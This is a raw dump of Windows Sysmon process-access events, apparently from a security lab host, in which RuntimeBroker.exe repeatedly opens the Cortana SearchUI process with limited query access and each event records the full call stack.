13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 